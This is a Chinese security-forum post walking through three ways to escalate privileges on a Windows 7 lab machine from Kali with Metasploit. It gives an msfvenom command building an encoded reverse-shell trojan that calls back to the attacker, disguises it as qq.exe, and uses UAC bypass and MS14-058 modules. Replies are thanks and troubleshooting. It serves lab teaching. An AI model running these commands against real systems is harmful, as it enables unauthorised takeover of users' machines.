用户
搜索

[内网攻防] 三种方式内网提权

  • TA的每日心情
    开心
    2021-2-5 09:55
  • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-脚本小子

    Rank: 2

    6

    主题

    26

    帖子

    151

    魔法币
    收听
    0
    粉丝
    1
    注册时间
    2020-12-14
    发表于 2021-1-29 17:50:34 1014057
    环境 攻击机kali2020        ip:192.168.233.133/24
            靶机 win7(32位)       ip:192.168.233.132/24

    权限提升方式
    1提高程序运行级别
    2UAC绕过
    3利用本地提权漏洞进行提权

    肉鸡上线,拿到用户权限

    1攻击机生成木马(msf.exe)
    msfVENOM -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.233.133 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >msf.exe
    图片1.png
    2攻击机配置监听脚本
    图片2.png
    3攻击机使用python,开启简单的http server,通过web服务来传送木马
    (python -m SimpleHTTPServer 888)
    图片3.png
    4win7靶机通过浏览器下载木马,并运行
    图片4.png
    图片5.png
    5攻击机弹出meterpreter回话,查看权限是用户权限,提升到系统权限失败
    图片6.png

    二提权(提升到系统权限)
    1提高程序运行级别  使用msf模块(exploit/windows/local/ask) 使用高权限来运行msf.exe
    并把msf.exe伪装成qq.exe
    图片二 1.png
    2在靶机上点是(Y),以高权限来运行qq.exe
    图片二 2.png
    3靶机以高权限运行qq.exe后,在攻击机上返回新的session(session2)
    图片二 3.png
    4进入session2 并提权发现可以成功提到系统权限
    图片二 4.png

    三bypass UAC提权
    1在攻击机上进入bypassuac模块,show options 查看配置
    图片三1.png
    2选择低权限的会话session1 (set session 1) 后exploit,发现生成新的session3
    图片三2.png
    图片三22.png
    3进入session3 (sessions -i 3)并提权,成为系统权限
    图片三3.png

    四 利用本地提权漏洞进行提权
    1 use exploit/windows/local/ms14_058_track_popup_menu ,进入模块后选择低权限的session
    (set session 1)并运行模块,发现生成新的session 4 ,并且session 4为系统权限。
    图片四1.png
    图片四 2.png

    感谢表哥分享,学习了!
    使用道具 举报 回复
    发表于 2021-2-1 15:06:54
    学习了,感谢分享
    使用道具 举报 回复
    感谢表哥分享
    使用道具 举报 回复
    dmhr_cc 发表于 2021-2-1 14:52
    感谢表哥分享,学习了!

    有不懂的欢迎提问哟
    使用道具 举报 回复

    有不懂的欢迎提问哟
    使用道具 举报 回复

    有不懂的欢迎提问哟
    使用道具 举报 回复
    草根 发表于 2021-2-1 15:06
    学习了,感谢分享

    不懂得欢迎提问哟
    使用道具 举报 回复
    发表于 2021-3-6 17:13:08
    我在kali 2019.3版本使用这三种方式提权失败,但一条shell命令即可直接提权到C盘下的system32,是什么问题?
    使用道具 举报 回复
    gkd1234 发表于 2021-3-6 17:13
    我在kali 2019.3版本使用这三种方式提权失败,但一条shell命令即可直接提权到C盘下的system32,是什么问题 ...

    靶机上安装的有杀软吗
    使用道具 举报 回复
    为你而来 发表于 2021-3-8 13:33
    靶机上安装的有杀软吗

    我用的靶机是08的,有可能靶机不同对应的补丁修复情况也不同
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册